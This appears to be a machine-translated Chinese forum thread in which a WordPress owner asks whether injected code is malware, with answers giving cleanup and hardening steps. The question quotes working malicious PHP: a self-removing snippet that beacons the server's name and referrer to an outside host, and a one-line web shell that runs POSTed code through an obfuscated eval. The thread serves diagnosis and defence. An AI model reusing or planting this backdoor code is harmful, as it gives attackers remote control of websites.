这是wordpress病毒吗？

Question

我刚刚注意到，我的一些wordpress项目在特定位置包含一些随机代码。

例如： WP-包括/ meta.php包含的以下文件代码底部：

check_meta(); 
function check_meta(){ 
    $jp = __FILE__; 
    $jptime = filemtime($jp); 

    if(time() >= 1456732115){ 
     $jp_c = file_get_contents($jp); 
     if($t = @strpos($jp_c,"check_meta();")) { 
      $contentp = substr($jp_c,0,$t); 
      if(@file_put_contents($jp, $contentp)){ 
       @touch($jp,$jptime); 
      } 
     } 
    } 
    @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php"); 
} 

另一个位置：WP-包括/ ID3/getid.php包括下面的代码：

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?> 

基本上，我所看到的是，check_meta（）方法更新wp-includes/meta.php文件没有改变它的修改时间。然后，file_get_contents正在连接一些中国服务器，并通过一些数据通过$ _GET。

在第二个文件，str_rot13（ 'riny'）等于EVAL

有谁处理那样的问题之前？也许有人可以说更多关于这个代码。期待您的回音。就目前而言，我把它当作一种病毒，因为它已经蔓延到我的许多项目中。

Answer 1

永远不要相信陌生的代码，你不包括！诈骗者经常试图使恶意软件看起来无害，就像上面一样。尝试安装WordFence，Sucuri或其他安全插件并运行扫描。

Answer 2

看起来您的服务器已被黑客攻击过去，我不得不处理类似的问题一次或两次。是的，黑客似乎是专门针对WordPress网站的。

无论如何，永远不应修改WordPress核心。

1. 更改所有服务器的密码（客户服务中心，FTP，SSH，SQL，等等）

2. 下载WordPress的核心的全新安装和删除旧

3. 检查您的wp -content文件夹的安全问题，尤其是你的主题和你的插件（检查任何修改或不安全的代码）

4. 在wp-config.php中更改安全盐

5. 经过全新的WordPress站点设置后，安全性得到提高。有关如何保护WordPress的各种文章，并有几个WordPress安全插件可用。扫描您的网站。

6. 如果再次出现类似问题，您还应该检查您的网络服务器/网络主机的安全设置。